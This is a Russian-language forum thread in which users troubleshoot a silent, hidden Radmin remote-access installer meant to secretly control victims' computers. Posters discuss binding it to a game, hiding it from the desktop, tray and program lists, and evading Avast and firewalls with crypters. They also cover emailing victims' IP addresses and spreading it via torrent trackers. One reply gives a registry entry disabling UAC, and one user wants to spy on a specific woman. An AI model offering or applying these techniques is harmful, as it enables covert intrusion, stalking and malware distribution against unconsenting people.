Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Статьи", создана пользователем Iindigo, 16 дек 2010.

1. вася666
    вася666 Новичок
    Симпатии:
    0
    вроди собрал как на первом посте (все точно по видео,только не понял сколько почт указывать? я указал две ...,правильно ли я сделал? или надо одну указывать?) ..еще не проверял(нет виртуалки виндовс7) сейчас качаю.. вопросик:как все таки можно убрать иконку радмина с рабочего стола,а то жертва знает что енто такое и запалит тут-же меня..???в диспетчере она не шарит,а вот с рабочим столом полная попа будет ((( попробую енти 4 файлика склеить смарт инстал маркером и спаять с игрухой например,уговорить запустить ентот сюрпризиг.. она запустит,но как быть с фаерволом и антивирусом?(у нее аваст стоит..никак немогу найти криптор,,все палится((( не знаю что делать... хелп ... зарание спасибо форумчанам за помощь ! очень нужно..мне только для одного человека(любовь и ложь) благодарю

16 янв 2011
  2. onthar
    onthar Продвинутый
    Симпатии:
    224
    Читай форум, ищи джойнеры, они поменяют иконку, склеят файл с любой программой.

в зависимости от того, сколько писем нужно, чтобы отправилось.
    На рабочем столе никаких файлов не появляется, вы что-то неверно сделали.

16 янв 2011
  3. крах
    крах Новичок
    Симпатии:
    14
    А нельзя чтоб после установки удолялся с рабочего стола?И как...

17 янв 2011
  4. onthar
    onthar Продвинутый
    Симпатии:
    224
    пост выше прочти.

17 янв 2011
  5. вася666
    вася666 Новичок
    Симпатии:
    0
    onthar--спасибо большое..это я понял иконку поменяю благо их много,но название то останется радмина..или можно его сменить до сборки? взять и переименовать например в games ,но если жертва кликанет по иконке,то вылезет сервер радмина? мне просто нужно чтоб его не было ни в трее ни на рабочем столе,а в процессах пусть висит себе на здоровье.то есть примерно так: она запускает установку типа игры, это все устанавливается но остается на раб. столе только игра с иконкою,а сам радмин поселяется в автозагрузке и в диспетчере и указанной папке,и больше нигде.вот о чем я.и последнее,как всетаки решается вопрос с обходом фаервола и антивирусов,и будет ли данная сборка обходить при перезагрузке uac? а то например тим вивер устанавливается и работает без проблем,но после перезагрузки блокируется UAC и ппц ,даж кейлогеры блокирует(((просто нет возможности в быть у компа жертвы,только через и.с. кидану

18 янв 2011
  6. onthar
    onthar Продвинутый
    Симпатии:
    224
    нет. Об этом уже пислось, читайте этот и соседние, посвященные радмину, топики.

18 янв 2011
  7. onthar
    onthar Продвинутый
    Симпатии:
    224
    да вроде.

Если прям UAC достает - можно его отключить. Там одна строчка в реестре:
    Код:
    Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "EnableLUA"=dword:00000000

18 янв 2011
  8. Iindigo
    Iindigo Guest
    вася666, ещё раз:
    - сборка не видна в установленных программах, пуске, трее. Никаких ярлыков, при установке, не создаётся.
    - в процессе установки UAC отключается.

Что касается антивирусов и файерволов, то большинство из них с радмином "знакомы" и не мешают ему работать. Антивирусы могут гавкнуть на патченную dll радмина или на сплойт.

18 янв 2011
  9. вася666
    вася666 Новичок
    Симпатии:
    0
    спасибо ребята,буду пробывать

21 янв 2011
  10. вася666
    вася666 Новичок
    Симпатии:
    0
    уффф ,сделал как на видео,письмо приходит ,есть ip, ввожу его на радмин вьевер, пишет невозможно подключится к серверу ! проверял на виртуальной вин 7. в чем может быть причина? подскажите пожалуйста. во время распоковки архива на виртуалке один раз появляется черный экранчик ненадолго и все.. в процессах не виден msupdate.msi. вообшем я ненашел следов радмина на виртуалке..спасибо зарание за помощь,может я что нить не так собрал? подскажите,в чем может быть ошибка?

22 янв 2011
  11. крах
    крах Новичок
    Симпатии:
    14
    Да у меня тоже такое бывает,походу просто у жертвы антивирус блочит.

22 янв 2011
  12. вася666
    вася666 Новичок
    Симпатии:
    0
    в том то и дело что я у себя его запускал на виртуалке))) там нет антивиря

22 янв 2011
  13. крах
    крах Новичок
    Симпатии:
    14
    Вот ща ко мне на почту постоянно приходит ип адреса у 4-х жертв ,к двоим могу подключится,а к остальным никак...Так что не переживай...Сборка работает на 100%

22 янв 2011
  14. вася666
    вася666 Новичок
    Симпатии:
    0
    и uac не вякал,он у меня включен там

22 янв 2011
  15. крах
    крах Новичок
    Симпатии:
    14
    Никаго еще не ломал этой сборкой?

22 янв 2011
  16. вася666
    вася666 Новичок
    Симпатии:
    0
    хммм,после перезагрузки виртуалки не пришло письмо на почту(((

Добавлено через 2 минуты
    гдето я накосячил,по ходу дела,но где???
    :crying:

Последнее редактирование: 22 янв 2011
    22 янв 2011
  17. крах
    крах Новичок
    Симпатии:
    14
    у мя тоже вроде с перезагрузки не приходит,ставь отправку через каждые 30 мин,знаешь как?

22 янв 2011
  18. вася666
    вася666 Новичок
    Симпатии:
    0
    нет только пробую пока что голяк полный((( скажи а ты как кидаешь архивчиг? антивири не палят? мне над обойти только аваст

22 янв 2011
  19. крах
    крах Новичок
    Симпатии:
    14
    Я заливал на украинские торрент-трекер там админ говорит типа поступила жалоба...Полюбому палятся отхар говорит его и не криптанешь никак типа драйвера там,я не шарю в этом,посоветовал крипт сервис...

Добавлено через 6 минут
    Я столкнулся с новой проблемой...Дело вот в чем-регестрирую новые почтовые ящики на яндексе а на них отчеты не шлет.и порта менял толку нет.Перепроверял 100500 раз тоже самое ,запарился уже...В разделе для новичков вапрос задашь загрызут типа не сори ,видишь итак сколько минусов.Не сталкивался?

22 янв 2011
  20. вася666
    вася666 Новичок
    Симпатии:
    0
    нет не зннаю,а как?

Добавлено через 3 минуты
    с почтой не сталкивался,вродь на 25 работает. а вопросы задавай пофиг все учились так)) а что ты не хочешь тим вивер поставить,почти тож самое,только не работает раб.стол на 7 и висте,а пароли и т д..как два пальца

22 янв 2011
Загрузка...